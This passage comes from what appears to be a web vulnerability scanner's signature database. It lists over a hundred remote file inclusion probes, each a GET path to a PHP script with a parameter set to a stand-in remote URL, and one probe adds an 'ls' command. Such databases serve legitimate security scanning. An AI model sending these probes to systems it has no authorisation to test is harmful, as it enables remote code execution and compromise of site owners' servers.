Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006033","https://gist.github.com/mubix/5d269c686584875015a2","c","/viart_cms-3.3.2/blocks/block_site_map.php?root_folder_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006034","https://gist.github.com/mubix/5d269c686584875015a2","c","/view.php?ariadne=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006035","https://gist.github.com/mubix/5d269c686584875015a2","c","/view.php?id=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006036","https://gist.github.com/mubix/5d269c686584875015a2","c","/view_func.php?i=@RFIURL&l=testfile.txt?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006037","https://gist.github.com/mubix/5d269c686584875015a2","c","/views/print/printbar.php?views_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006038","https://gist.github.com/mubix/5d269c686584875015a2","c","/visible_count_inc.php?statitpath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006039","https://gist.github.com/mubix/5d269c686584875015a2","c","/visitor.php?_SERVER[DOCUMENT_ROOT]=@RFIURL??","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006040","https://gist.github.com/mubix/5d269c686584875015a2","c","/volume.php?config[public_dir]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006041","https://gist.github.com/mubix/5d269c686584875015a2","c","/vote.php?Madoa=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006042","https://gist.github.com/mubix/5d269c686584875015a2","c","/votebox.php?VoteBoxPath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006043","https://gist.github.com/mubix/5d269c686584875015a2","c","/vp/configure.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006044","https://gist.github.com/mubix/5d269c686584875015a2","c","/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006045","https://gist.github.com/mubix/5d269c686584875015a2","c","/w-agora_path/add_user.php?bn_dir_default=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006046","https://gist.github.com/mubix/5d269c686584875015a2","c","/w-agora_path/create_forum.php?bn_dir_default=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006047","https://gist.github.com/mubix/5d269c686584875015a2","c","/w-agora_path/create_user.php?bn_dir_default=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006048","https://gist.github.com/mubix/5d269c686584875015a2","c","/w-agora_path/delete_notes.php?bn_dir_default=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006049","https://gist.github.com/mubix/5d269c686584875015a2","c","/w-agora_path/delete_user.php?bn_dir_default=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006050","https://gist.github.com/mubix/5d269c686584875015a2","c","/w-agora_path/edit_forum.php?bn_dir_default=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006051","https://gist.github.com/mubix/5d269c686584875015a2","c","/w-agora_path/mail_users.php?bn_dir_default=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006052","https://gist.github.com/mubix/5d269c686584875015a2","c","/w-agora_path/moderate_notes.php?bn_dir_default=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006053","https://gist.github.com/mubix/5d269c686584875015a2","c","/w-agora_path/reorder_forums.php?bn_dir_default=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006054","https://gist.github.com/mubix/5d269c686584875015a2","c","/wamp_dir/setup/yesno.phtml?no_url=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006055","https://gist.github.com/mubix/5d269c686584875015a2","c","/wapchat/src/eng.adCreate.php?sysFileDir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006056","https://gist.github.com/mubix/5d269c686584875015a2","c","/wapchat/src/eng.adCreateSave.php?sysFileDir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006057","https://gist.github.com/mubix/5d269c686584875015a2","c","/wapchat/src/eng.adDispByTypeOptions.php?sysFileDir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006058","https://gist.github.com/mubix/5d269c686584875015a2","c","/wapchat/src/eng.createRoom.php?sysFileDir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006059","https://gist.github.com/mubix/5d269c686584875015a2","c","/wapchat/src/eng.forward.php?sysFileDir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006060","https://gist.github.com/mubix/5d269c686584875015a2","c","/wapchat/src/eng.pageLogout.php?sysFileDir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006061","https://gist.github.com/mubix/5d269c686584875015a2","c","/wapchat/src/eng.resultMember.php?sysFileDir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006062","https://gist.github.com/mubix/5d269c686584875015a2","c","/wapchat/src/eng.roomDeleteConfirm.php?sysFileDir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006063","https://gist.github.com/mubix/5d269c686584875015a2","c","/wapchat/src/eng.saveNewRoom.php?sysFileDir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006064","https://gist.github.com/mubix/5d269c686584875015a2","c","/wapchat/src/eng.searchMember.php?sysFileDir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006065","https://gist.github.com/mubix/5d269c686584875015a2","c","/wapchat/src/eng.writeMsg.php?sysFileDir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006066","https://gist.github.com/mubix/5d269c686584875015a2","c","/war.php?vwar_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006067","https://gist.github.com/mubix/5d269c686584875015a2","c","/war.php?vwar_root=@RFIURL?&cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006068","https://gist.github.com/mubix/5d269c686584875015a2","c","/warn.php?file=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006069","https://gist.github.com/mubix/5d269c686584875015a2","c","/watermark.php?GALLERY_BASEDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006070","https://gist.github.com/mubix/5d269c686584875015a2","c","/wbxml/WBXML/Decoder.php?base_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006071","https://gist.github.com/mubix/5d269c686584875015a2","c","/wbxml/WBXML/Encoder.php?base_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006072","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/Administration/Includes/configureText.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006073","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/Administration/Includes/contentHome.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006074","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/Administration/Includes/deleteContent.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006075","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/Administration/Includes/deleteUser.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006076","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/Administration/Includes/userHome.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006077","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules//Module/Module.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006078","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006079","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006080","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006081","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006082","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006083","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006084","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/EditProfileModule/external.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006085","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006086","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006087","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006088","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006089","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006090","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006091","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006092","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006093","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006094","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006095","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006096","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006097","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006098","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006099","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006100","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006101","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006102","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006103","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006104","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006105","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006106","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006107","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006108","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006109","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/MyNetworksModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006110","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006111","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006112","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006113","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006114","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006115","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006116","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006117","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006118","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006119","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006120","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006121","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006122","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006123","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006124","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006125","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006126","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006127","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006128","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006129","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006130","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006131","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006132","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006133","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006134","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006135","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/Flickrclient.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006136","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/help.php?LIBSDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006137","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/includes/blogger.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006138","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/includes/functions/auto_email_notify.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006139","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/includes/functions/html_generate.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006140","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/includes/functions/validations.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006141","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/index.php?LIBSDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006142","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/lib/xml/oai/ListRecords.php?xml_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006143","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/login.php?LIBSDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006144","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/logout.php?LIBSDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006145","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/lom.php?ETCDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006146","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/network_module_selector.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006147","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/submit_abuse.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006148","https://gist.github.com/mubix/5d269c686584875015a2","c","/web/submit_comment.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006149","https://gist.github.com/mubix/5d269c686584875015a2","c","/webavis/class/class.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006150","https://gist.github.com/mubix/5d269c686584875015a2","c","/webavis/class/class.php?root=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006151","https://gist.github.com/mubix/5d269c686584875015a2","c","/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006152","https://gist.github.com/mubix/5d269c686584875015a2","c","/webnews/template.php?content_page=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006153","https://gist.github.com/mubix/5d269c686584875015a2","c","/webroot/css.php?CONFIGS=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006154","https://gist.github.com/mubix/5d269c686584875015a2","c","/webyep-system/program/lib/WYURL.php?webyep_sIncludePath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006155","https://gist.github.com/mubix/5d269c686584875015a2","c","/webyep-system/programm/webyep.php?webyep_sIncludePath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006156","https://gist.github.com/mubix/5d269c686584875015a2","c","/window.php?action=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006157","https://gist.github.com/mubix/5d269c686584875015a2","c","@WORDPRESSwp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006158","https://gist.github.com/mubix/5d269c686584875015a2","c","/work/index.php?g_include=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006159","https://gist.github.com/mubix/5d269c686584875015a2","c","/work/module/forum/forum.php?g_include=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006160","https://gist.github.com/mubix/5d269c686584875015a2","c","/worldpay_notify.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006161","https://gist.github.com/mubix/5d269c686584875015a2","c","@WORDPRESSwp-cache-phase1.php?plugin=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006162","https://gist.github.com/mubix/5d269c686584875015a2","c","@WORDPRESSwp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006163","https://gist.github.com/mubix/5d269c686584875015a2","c","@WORDPRESSwp-content/plugins/myflash/myflash-button.php?wpPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006164","https://gist.github.com/mubix/5d269c686584875015a2","c","@WORDPRESSwp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006165","https://gist.github.com/mubix/5d269c686584875015a2","c","@WORDPRESSwp-content/plugins/wordtube/wordtube-button.php?wpPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006166","https://gist.github.com/mubix/5d269c686584875015a2","c","@WORDPRESSwp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006167","https://gist.github.com/mubix/5d269c686584875015a2","c","@WORDPRESSwp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006168","https://gist.github.com/mubix/5d269c686584875015a2","c","/wsk/wsk.php?wsk=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006169","https://gist.github.com/mubix/5d269c686584875015a2","c","/xarg_corner.php?xarg=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006170","https://gist.github.com/mubix/5d269c686584875015a2","c","/xarg_corner_bottom.php?xarg=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006171","https://gist.github.com/mubix/5d269c686584875015a2","c","/xarg_corner_top.php?xarg=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" 